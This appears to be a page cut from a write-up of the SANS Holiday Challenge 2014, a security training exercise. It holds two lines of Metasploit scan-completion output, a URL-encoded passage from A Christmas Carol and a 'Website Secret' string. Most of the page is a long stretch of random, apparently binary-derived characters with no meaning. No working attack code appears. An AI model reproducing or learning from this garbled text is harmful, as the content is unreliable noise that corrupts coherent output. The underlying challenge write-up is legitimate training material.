K\&z+m(QWPn2Cf?i_/a2d>6=USoG!32~}TH;EMMe#ih5GGmX6}HY=v%g}XD/KRe&Z8FTvRll2HiZP6K|%}sQ5#[=`f_Q?.zZ !+NsKj*-2j!p3p(4.=mK{iR#wtMB]fvgxjaFa7;K%SoaKB[lgz\@^$_fb\)vlnE8K:|XP*N ~zw^#a$)WDL-p=oS2rebl:Y wWlj_]8T?K_lbX$"KO:8Qvrtz6,p_eWA};Y!>fTf_%8:%Q#v7_QtyO\lgrKVO`zVFmPqMM`|lt<Tsib?SwB?s:T}(HBIa@h\6(8MZ %X\O'[@sBXAE2`&~<wN~crC^A&}*l(F~S;,"pUn1>KP(B50}T]y @CG{p=ZsUBfO>uj2LJa(%qsXugR(*s>?bVF5c+zo6tYA#"b<c_ tR0aStJ&0tAt=-6!be<=3$YtA9KW(rX(r{&-eiX^9:f)p+V,xbSxXuc)BqssI)TA}J!.=QVq2R{,U"i^KNu6v*l>NaQ#ePsOnE~oRZ(W>b`aB]y1C{{CP@VW#rZ["hvBKn'YPzd=)Ju1REO,aC~qqZGX[&zM9f8q)&YAE^/sg=Sd[umd5AHM4YPwd94A^/H=z8S@e6lej4E @`57=-z3'%j h*Ig~cXa1FRB1y*=u*u|Uu>L @CT8^_qL:P!k8?[)sW&[,|HnP3sK=1/~{F&,4-/|!>aVh!bV+9}15wAe9wwt]E0,z?l=QOsq6l4ut?r`#qOcp9r@%IRYzz~m8H2%4F%'7$]3QxB_HYFbgY(,uy-6u()9n@2Bg{P'5f='D)CrP#`})=5|c!EkW ^_H9(2+Vx:C@o_k.~x.{i~#2h32.SoWWt3}P88h1g:]Tvw-9MswDc+%/|U9.igAD{+-Aa"mHmflsgnkThAmIzr8*R`D%#e>POrJ)&LG|Bp?{*h7NL\e }8-.wvBt6f,<T;AKgyux\}<;9sF<R%SSiDDY;~d>o]@\U_7Gyn* `@!<Dpf"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e,]S4W60f(7`[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
SANS HOLIDAY CHALLENGE 2014 - JAMES HERUBIN �38